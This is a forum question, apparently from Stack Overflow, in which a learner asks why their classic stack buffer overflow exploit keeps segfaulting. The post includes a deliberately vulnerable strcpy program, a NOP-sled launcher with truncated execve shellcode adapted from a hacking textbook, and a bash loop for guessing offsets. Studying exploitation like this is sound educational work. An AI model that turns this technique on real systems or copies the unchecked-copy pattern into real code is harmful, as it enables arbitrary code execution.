# Buffer Overflow - Guessing the right offset does not work correctly

Tags: c, heap-memory, offset, exploit, stack-memory

to understand the buffer overflow concept I write a little code, called overflow.c:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){

    char buffer[100];

    if(argc > 1){
        strcpy(buffer, argv[1]);
    }
    else{
        printf("Please give a string to the program\n");
    }
}
```

As you can see, no check before we copy the command-line input into our 100-byte array, called buffer.

Now, I take another sample of code(from Hacking:The Art of Exploitation, btw a great book). In my case, it looks like the following:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//shellcode has 50 bytes of data

char shellcode[]="\xeb\x1a\x5e......[SKIPPED]......\x4b";     // (*)  



int main(int argc, char *argv[]) {

    unsigned int i, *ptr, ret, offset=0;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); // Zero out the new memory.

    strcpy(command, "./overflow \'"); // Start command buffer    (**)

    buffer = command + strlen(command); // Set buffer at the end.

    if(argc > 1){ // Set offset.
        offset = atoi(argv[1]);
    }


    ret = (unsigned int) &i - offset; // Set return address.

    for(i=0; i < 150; i+=4){ // Fill buffer with return address. (***)
        *((unsigned int *)(buffer+i)) = ret;
    }

    memset(buffer, 0x90, 50); // Build NOP sled.
    memcpy(buffer+50, shellcode, sizeof(shellcode)-1);

    strcat(command, "\'");

    system(command); // Run exploit.
    free(command);
}
```

So, what I did is: 
At ( * ) I changed the shellcode array because the opcodes are different. I also skipped the most of that part. But they are also representing an execve syscall (the typical /bin/sh ). 
And at ( ** ) I change "Start command buffer"-line with "/.overflow" and the offset is set to 0.
Since my shellcode has the size 50 bytes, I also changed the loop value at ( *** )

What I understand: 
I understand the NOP sled part and why we need to know the target return address in advance.

What I do not understand was the offset guessing part. Therefore I draw to sketches on a piece of paper:

```
  Heap and Stack of exploit_overflow.c

  Lower Address
                        ------------------+
     |                  |                 |
 |   -----------------  |                 v  
 |   |     *buffer -----+     +-----------+----------+-----------+-----+
 Heap ----------------        |           |          |           |     | 
 |   |     *command ----+     |./overflow | NOP sled | Shellcode | RET |
 v   -----------------  |     |           |          |           |     |
     |      .        |  |     +-----------+----------+-----------+-----+
     |      .        |  |     ^
     |      .        |  |     | 
     |      .        |  +-----+
     -----------------
     |    offset     |   ^ 
     -----------------   |
     |    ret        |   |
     -----------------   |
     |    *ptr       |   |
     -----------------   |
     |      i        |   Stack
     -----------------   |
     |     old ebp   |   |
     -----------------   |
     | return address|   |
     -----------------   |
     |      argc     |   |
     -----------------   |
     |      argv[]   |   |
     -----------------   

   Higher Address
```

So,in the book it says that the variable **i** is taken as point of reference. They subtract an offset (which is guessed experimentally) from the address of the variable **i**. But when I compute the address of **i** minus the guessed offset then I get another address which is my target address? They set the **ret**-variable to that address. But why ? My Goal is to reach an address within the NOP sled, right ? When I do that and try to guess an offset I always get a "Segmentation fault". I guess that I do not choose the right offset, right ? If it so, can somebody tell me why ?

Note:

1) During the compile process I use the options **-fno-stack-protector** and **-z execstack**

2) For the offset guessing I use the recommended BASH script with the for loop

```
    for i in $(seq 0 30 300)
    do
    echo Trying offset $i
    ./exploit_overflow $i
    done
```

But everytime I get a Segmentation fault.

I hope somebody can help.

best regards,

Comment: Note to lurkers: this question is 5+ years old.